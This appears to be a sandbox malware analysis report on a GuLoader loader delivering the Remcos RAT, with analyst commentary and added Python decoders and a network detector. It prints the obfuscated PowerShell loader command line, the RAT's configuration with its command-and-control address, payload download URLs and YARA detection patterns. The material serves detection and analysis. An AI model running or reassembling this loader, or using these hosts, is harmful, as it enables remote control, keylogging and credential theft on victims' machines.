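def brassart_decode(blob: str, width: int = 1) -> str:
    """Mirror of Brassart.  width plays the role of $Transplantat: 1 on a
    normal host; 0 when $host.CurrentCulture is empty, in which case every
    Substring(i, 0) is empty and nothing decodes."""
    limit = len(blob) - width          # $Unbarking = Length - $Transplantat
    out = []
    i = BLOCK - 1                      # $Catacrotism starts at 7
    while i < limit:
        out.append(blob[i:i + width])  # Substring($Catacrotism, $Transplantat)
        i += BLOCK
    return "".join(out)


def is_well_formed(blob: str) -> bool:
    """Integrity check (observation about this sample, not the scheme): every
    intact string is k payload blocks of 8 plus one trailing block of seven
    junk characters and a space, so its length is a multiple of 8.  A string
    of any other length has lost or gained characters in transit, which
    shifts every later payload character."""
    return len(blob) >= BLOCK and len(blob) % BLOCK == 0


# $Deletive: the user-agent the report's "known web browser user agent"
# signature refers to (copied from the command line on this page)
DELETIVE = (
    " UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/"
    "saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoon"
    "Ho edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina "
    "spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.ei"
    "Sp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4"
    "Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1"
    "Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc Haggadk"
    "BantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1"
    " Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf"
    " .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0"
    "Cleansg "
)
# $Capkin: the header name that goes with it
CAPKIN = (" Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik ise"
          "Irishgrnpopsi,stUnaisle ")
# $Paleoandesite: must equal the cmd.exe child's command line in the process
# tree, which makes it a self-check for the decoder
PALEOANDESITE = (
    " BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrp"
    "Tidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\\waver,nA"
    "midwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed ei"
    "familieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi ins"
    "Sortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumo"
    "Unciale DroplettSubvers "
)
# $Grossisten: the invoker handed to '&', so a command name is expected.
# As rendered on this page it is 31 characters, one short of whole blocks.
GROSSISTEN = " inergiforkodeeSemiurnxInosini "


def decode_all():
    """Decode the page's strings, keeping the integrity verdict per string."""
    samples = {"Deletive": DELETIVE, "Capkin": CAPKIN,
               "Paleoandesite": PALEOANDESITE, "Grossisten": GROSSISTEN}
    return {name: (is_well_formed(s), brassart_decode(s))
            for name, s in samples.items()}


if __name__ == "__main__":
    for name, (ok, text) in decode_all().items():
        print(f"{name:14} {'ok ' if ok else 'BAD'} {text!r}")
```

Three of the four strings decode cleanly and can be cross-checked against the page itself: `$Deletive` becomes a Firefox user-agent, `$Capkin` becomes `User-Agent`, and `$Paleoandesite` becomes exactly the `echo %appdata%\Appelmulighed.Bes && echo t` command line of the cmd.exe children (PIDs 5396 and 7456). `$Grossisten` does not: its length fails the check and it decodes to `fSI`, which is not a command name, so the text reproduced on this page has lost one character from that string and the sandbox's raw command line, not the rendered page, is what should be decoded. The same applies to `$Skrbeligt157`, which on this copy decodes to `http://103.237.86.247/` followed by characters that do not look like a path; the host is worth noting next to the configured C2 (`103.237.87.32:1999`), but the path should be taken from the report's network section rather than from this text. Always validate decoded strings against something independently known, as the cmd.exe command line does here, before treating them as indicators.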
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000E.00000002.1726977424.00000000088B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
(8 further memory-dump matches are not included in this excerpt)
Source | Rule | Description | Author
amsi64_720.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7368.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Matched strings (amsi32_7368.amsi.csv):
  • 0xef55:$b2: ::FromBase64String(
  • 0xdfd3:$s1: -join
  • 0x13347:$s3: Reverse
  • 0x777f:$s4: +=
  • 0x7841:$s4: +=
  • 0xba68:$s4: +=
  • 0xdb85:$s4: +=
  • 0xde6f:$s4: +=
  • 0xdfb5:$s4: +=
  • 0x1806d:$s4: +=
  • 0x180ed:$s4: +=
  • 0x181b3:$s4: +=
  • 0x18233:$s4: +=
  • 0x18409:$s4: +=
  • 0x1848d:$s4: +=
  • 0xe7fa:$e4: Get-WmiObject
  • 0xe9e9:$e4: Get-Process
  • 0xea41:$e4: Start-Process
  • 0x18cf7:$e4: Get-Process

System Summary

Source: Process started. Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community. Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", ProcessId: 4084, ProcessName: wscript.exe
Source: Process started. Author: Nasreddine Bencherchali (Nextron Systems). Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7732, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl", ProcessId: 7928, ProcessName: wab.exe
Source: Process started. Author: Michael Haag. Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", ProcessId: 4084, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle 
';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivarii
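Every string in the PowerShell stage above is hidden behind `Brassart`: the function walks its argument from index 7 in steps of 8 and keeps `$Transplantat` characters at each stop, and `$Transplantat` is 1 because `$Transplantat++` on an undefined variable yields 1 once `${host}.CurrentCulture` (non-null in a normal console host) is seen. Every eighth character is therefore payload and the other seven are filler. The Python below is an added example, not code from the report or from the sample; it re-implements the decoder, reads the start and stride out of the `For` loop so a variant with a different offset still decodes, and runs it over two literals copied from the command line (`$Deletive`, which decodes to the Firefox User-Agent seen in the GET requests to 103.237.86.247, and `$Capkin`, which decodes to the header name `User-Agent`). Runs of spaces inside the literals are significant, so feed the decoder the raw command line rather than text copied from a rendered page that collapses whitespace.

```python
import re

# Constructed sample: the decoder definition and two of its string literals,
# copied from the PowerShell command line in this report. The rest of the
# script is omitted; only these pieces are needed for the demonstration.
DELETIVE = " UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg "
CAPKIN = " Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle "

SAMPLE_SCRIPT = (
    "If (${host}.CurrentCulture) {$Transplantat++;}"
    + "Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;"
    + "$Sendetiders='SUBsTRI';$Sendetiders+='ng';"
    + "For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8)"
    + "{$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}"
    + "$Knyttelversenes;}"
    + "$Deletive=Brassart '" + DELETIVE + "';"
    + "$Capkin=Brassart '" + CAPKIN + "';"
)

# For( $i=<start>; $i -lt $limit; $i+=<step> )
LOOP_RE = re.compile(r"For\(\s*\$\w+\s*=\s*(\d+)\s*;.*?\$\w+\s*\+=\s*(\d+)\s*\)")
# $Name=Brassart '<literal>'   (also matches the "Sarcophilus (Brassart '...'" form)
LITERAL_RE = re.compile(r"(\$\w+)\s*=\s*Brassart\s*\(?\s*'([^']*)'")


def loop_params(script):
    """Pull (start, step) out of the decoder's For loop, so a variant that
    changes the offset or the stride decodes without editing this code."""
    m = LOOP_RE.search(script)
    if m is None:
        raise ValueError("Brassart-style For loop not found")
    return int(m.group(1)), int(m.group(2))


def brassart(blob, start=7, step=8, width=1):
    """Python equivalent of Brassart($Slingrer).

    Keeps `width` characters every `step` characters beginning at `start`,
    while the index is strictly below len(blob) - width; that mirrors
    $Unbarking = Length - $Transplantat and the -lt comparison, which is why a
    trailing filler chunk never contributes a character.
    """
    limit = len(blob) - width
    return "".join(blob[i:i + width] for i in range(start, limit, step))


def decode_literals(script):
    """Map every `$Name=Brassart '...'` assignment in `script` to its plaintext."""
    start, step = loop_params(script)
    return {name: brassart(lit, start, step) for name, lit in LITERAL_RE.findall(script)}


if __name__ == "__main__":
    for name, value in decode_literals(SAMPLE_SCRIPT).items():
        print(f"{name} = {value!r}")
```

`decode_literals` is the part worth keeping: point it at the full command line from the process tree and the URL, the `cmd` persistence line and the `iex` invocation all fall out in one pass, without executing anything.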

                Stealing of Sensitive Information

                barindex
                Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\remcos\logs.dat
                No Snort rule has matched

                AV Detection

                barindex
                Source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara match | File source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 0000000E.00000002.1726081150.0000000008390000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf | source: powershell.exe, 0000000E.00000002.1723632726.000000000741D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB | source: powershell.exe, 0000000E.00000002.1723632726.00000000073BF000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_245710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 17_2_245710F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 17_2_24576580 FindFirstFileExA | 17_2_24576580
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW | 20_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen | 23_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen | 24_2_00407898

                Software Vulnerabilities

                barindex
                Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Malware configuration extractor | URLs: 103.237.87.32
                Source: global traffic | TCP traffic: 192.168.2.7:49708 -> 103.237.87.32:1999
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 178.237.33.50
                Source: Joe Sandbox View | ASN Name: BGNR-AP2BainandCompanySG
                Source: global traffic | HTTP traffic detected: GET /Teentsier.lpk HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 103.237.86.247 | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /mbLXhRfFSSN77.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 103.237.86.247 | Cache-Control: no-cache
                Source: unknown | TCP traffic detected without corresponding DNS query: 103.237.86.247 (this event is listed 50 times in the report)
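The network evidence above has the shape that separates loader and RAT traffic from the host's normal activity: the only name the sandbox resolved is geoplugin.net (the geolocation lookup Remcos makes on start-up), while every connection to 103.237.86.247 (the payload downloads) and to 103.237.87.32:1999 (the configured C2) went to a literal IP with no DNS query before it. The Python below is an added example, not code from the report: it correlates DNS answers with outbound connections and flags external destinations that were never resolved, then collapses repeats into a count the way the 50 identical lines above should be read. The records are constructed to mirror the report's traffic; the source port and the destination port 80 for the HTTP downloads are assumptions, as is the one-hour window a resolution is allowed to cover.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsAnswer:
    ts: float       # epoch seconds of the answer
    qname: str
    answer: str     # resolved IPv4/IPv6 address


@dataclass(frozen=True)
class Conn:
    ts: float
    src: str
    dst: str
    dport: int
    proto: str = "tcp"


# Constructed sample modelled on this report: geoplugin.net was resolved to
# 178.237.33.50 and then contacted; the loader and the RAT talked to raw IPs.
SAMPLE_DNS = [
    DnsAnswer(100.0, "geoplugin.net", "178.237.33.50"),
]
SAMPLE_CONNS = [
    Conn(50.0, "192.168.2.7", "103.237.86.247", 80),      # GET /Teentsier.lpk (port assumed)
    Conn(60.0, "192.168.2.7", "103.237.86.247", 80),      # GET /mbLXhRfFSSN77.bin (port assumed)
    Conn(101.0, "192.168.2.7", "178.237.33.50", 80),      # GET /json.gp, resolved one second earlier
    Conn(120.0, "192.168.2.7", "103.237.87.32", 1999),    # Remcos C2 from the extracted config
    Conn(130.0, "192.168.2.7", "192.168.2.1", 445),       # internal, ignored
]


def is_external(ip):
    """True for routable addresses; RFC1918, loopback, link-local and multicast are skipped."""
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local or a.is_multicast)


def dnsless_connections(dns, conns, max_age=3600.0):
    """Return the external connections whose destination address was not
    handed out by a DNS answer within `max_age` seconds before the connect."""
    resolved = {}                                   # ip -> [(answer_ts, qname), ...]
    for d in dns:
        resolved.setdefault(d.answer, []).append((d.ts, d.qname))
    hits = []
    for c in conns:
        if not is_external(c.dst):
            continue
        covered = any(ts <= c.ts <= ts + max_age for ts, _ in resolved.get(c.dst, []))
        if not covered:
            hits.append(c)
    return hits


def summarize(hits):
    """Collapse repeated hits into a dst:port -> count table for triage."""
    counts = {}
    for h in hits:
        key = f"{h.dst}:{h.dport}"
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for key, n in summarize(dnsless_connections(SAMPLE_DNS, SAMPLE_CONNS)).items():
        print(f"{key}\tconnections without prior DNS: {n}")
```

The time window matters in both directions: an answer that arrives after the connection does not explain it, and a stale answer from hours ago should not either, otherwise one legitimate lookup of a CDN address whitelists every later connection to that IP.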
                Source: wab.exe | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.2
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.23
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.8
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.2
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.24
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E8022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E81AD4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/T
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Te
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Tee
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teen
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teent
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teents
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsi
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsie
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsier
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsier.
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsier.l
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsier.lp
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsier.lpk
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E8022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsier.lpkP
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/Teentsier.lpkXR
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/mbLXhRfFSSN77.bin
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.237.86.247/mbLXhRfFSSN77.binH
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E81E28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://103.237H
